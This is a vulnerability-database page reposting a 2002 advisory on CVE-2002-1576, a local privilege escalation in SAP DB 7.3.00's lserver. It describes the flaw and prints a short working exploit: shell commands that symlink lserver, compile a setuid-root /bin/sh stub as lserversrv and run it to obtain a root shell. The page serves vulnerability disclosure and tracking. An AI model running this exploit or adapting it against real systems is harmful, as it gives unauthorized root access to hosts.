Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

SAP DB 7.3.00 - Symbolic Link

Related Vulnerabilities: CVE-2002-1576  
Publish Date: 04 Dec 2002
Author: SAP Security
Source / Download Exploit 
                							

                source: http://www.securityfocus.com/bid/6316/info

A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory. 

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started